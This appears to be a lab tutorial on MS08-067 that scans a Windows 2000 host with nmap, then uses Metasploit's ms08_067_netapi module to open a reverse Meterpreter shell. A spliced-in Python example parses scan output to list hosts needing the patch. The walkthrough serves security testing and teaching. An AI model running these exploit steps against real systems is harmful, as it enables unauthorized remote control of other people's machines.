Testing the MS08-067 vulnerability with Metasploit

1) MS08-067 description
The full name of the MS08-067 vulnerability is "Windows Server Service RPC Request Buffer Overflow Vulnerability". If an affected system receives a specially crafted RPC request, the vulnerability could allow remote code execution.
MS08-067 affects every Windows system except Windows Server 2008 Core, including all versions of Windows 2000/XP/Server 2003/Vista/Server 2008, and even the pre-release Windows 7 Pre-Beta.
2) Exploiting the vulnerability
Test environment: Windows 2000
First, scan the host with nmap:
C:\Users\dell>nmap -sS -A --script=smb-check-vulns --script-args=unsafe=1 -P0 172.16.100.166
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
| MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
The host script results report MS08-067: VULNERABLE.
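To turn scan output like the block above into a patch list, here is an added example (not part of the original post) that parses nmap's smb-check-vulns host-script block for every host in a scan and lists the hosts flagged VULNERABLE. The two-host sample output is constructed; the first host mirrors the 172.16.100.166 results shown above.

```python
import re
from collections import defaultdict

# Constructed sample: nmap output for two hosts in the same
# "Host script results" layout the page shows for 172.16.100.166.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 172.16.100.166
Host script results:
| smb-check-vulns:
|   MS08-067: VULNERABLE
|   Conficker: Likely CLEAN
|   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|   MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_  MS07-029: NO SERVICE (the Dns Server RPC service is inactive)

Nmap scan report for 172.16.100.200
Host script results:
| smb-check-vulns:
|   MS08-067: NOT VULNERABLE
|   Conficker: Likely CLEAN
|_  SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
# One check line: "|   <name>: <status>"; "|_" marks the block's last line.
CHECK_RE = re.compile(r"^\|_?\s+(?P<name>[^:]+):\s+(?P<status>.+)$")

def parse_smb_check_vulns(text):
    """Return {host: {check_name: status}} for each smb-check-vulns block."""
    results = defaultdict(dict)
    host, in_block = None, False
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host, in_block = m.group(1), False
            continue
        if line.startswith("| smb-check-vulns:"):
            in_block = True
            continue
        if in_block and host:
            m = CHECK_RE.match(line)
            if not m:
                in_block = False          # left the script block
                continue
            results[host][m.group("name").strip()] = m.group("status").strip()
            if line.startswith("|_"):
                in_block = False          # last line of the block
    return dict(results)

def vulnerable_hosts(results):
    """Hosts where any smb-check-vulns check reports exactly VULNERABLE."""
    return sorted(h for h, checks in results.items()
                  if any(s == "VULNERABLE" for s in checks.values()))
```

Run it over a saved `nmap -oN` report to get the hosts that still need the MS08-067 patch applied.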
Next, use Metasploit:
msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 172.16.100.166
rhost => 172.16.100.166
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 172.16.100.128:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2000 - - lang:Chinese - Traditional
[*] Selected Target: Windows 2000 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (885806 bytes) to 172.16.100.166
[*] Meterpreter session 2 opened (172.16.100.128:4444 -> 172.16.100.166:1030) at 2016-06-29 09:46:54 +0800

meterpreter >